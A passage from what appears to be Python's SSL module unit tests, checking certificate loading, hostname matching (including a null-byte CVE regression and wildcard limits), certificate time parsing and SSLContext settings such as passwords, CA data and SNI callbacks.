s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = u'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # a wildcard in the first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = u'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(socket.socket()) as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
        # no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0):
default |= ssl.OP_NO_COMPRESSION
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegexp(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Pass a password longer than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegexp(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegexp(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
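# Summary of the password contract exercised above: the password argument
# accepts str, bytes or bytearray, or a callable returning one of those; the
# callable is only invoked when the key is actually encrypted, e.g.
#   ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
#   ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)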
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError):
ctx.load_verify_locations(u'')
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read().decode("ascii")
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read().decode("ascii")
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata=u"broken")
with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
filename = u'dhpäräm.pem'
fs_encoding = sys.getfilesystemencoding()
try:
filename.encode(fs_encoding)
except UnicodeEncodeError:
self.skipTest("filename %r cannot be encoded to the filesystem encoding %r" % (filename, fs_encoding))
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(IOError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
with support.temp_dir() as d:
fname = os.path.join(d, filename)
shutil.copy(DHFILE, fname)
ctx.load_dh_params(fname)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
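# As checked above, certificates without the CA:TRUE basic constraint are not
# listed by get_ca_certs(), and get_ca_certs(True) returns the DER encoding
# rather than the decoded dict.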
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
